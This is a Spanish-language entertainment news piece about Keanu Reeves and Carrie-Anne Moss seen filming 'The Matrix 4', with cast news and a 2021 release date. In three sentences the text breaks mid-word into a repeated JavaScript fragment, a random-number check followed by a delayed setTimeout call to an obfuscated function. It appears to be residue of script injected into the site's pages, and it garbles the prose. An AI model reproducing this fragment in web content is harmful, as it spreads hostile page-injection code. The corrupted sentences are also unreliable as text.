Neo y Trinity se reúnen en ‘The Matrix 4’

    Neo y Trinity se reúnen en ‘The Matrix 4’

    Esto es lo que muestran las redes sociales.

    Autor: Redacción Maxim 17 febrero, 2020


    FOTO: Warner Bros.

     

     

    Matrix 4 no es el set más secreto, aparentemente.

     

    Eso es bueno para los fanáticos de la película, ya que nos han mostrado a los actores que conocemos de las películas 1-3 dejandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando preguntas intrigantes, como las imágenes que capturaron a Carrie-Anne Moss (Trinity) y Keanu Reeves (Neo) dandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un paseo.

     

    
    

     

    Este video tomado en California, y publicado en Twitter el 16 de febrero, revela a Trinity en una motocicleta con Neo como su pasajero.

     

     

    Es cierto que no es el clip ni las fotos más claras, pero Trinity parece estar usandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su atuendo habitual de Matrix (cuero negro, cabello peinado). Reeves todavía se ve muy parecido a John Wick con su barba y cabello largo, fotos revelan su nuevo estilo.

     

    El 15 de febrero se publicó otro video hecho a distancia de lo que obviamente parece ser un truco al estilo Matrix. Parece que volveremos a ese mundo digital tal como lo crearon los Wachowski hace 20 años.

     

     

     

    Lana Wachowski está dirigiendo la cuarta Matrix y mientras Laurence Fishburne aparentemente no regresa como Morpheus, Jada Pinkett regresa como el Capitán Niobe y hay una gran cantidad de nuevos miembros del elenco, incluidos Yahya Abdul-Mateen II, Neil Patrick Harris, Jonathan Groff, Toby Onwumere, Eréndira Ibarra y Jessica Henwick.

     

    Matrix 4 está programada para estrenarse en cines el 21 de mayo de 2021.

     

     

    Temas relacionados con esta nota: , , , , ,

Esto es lo que muestran las redes sociales.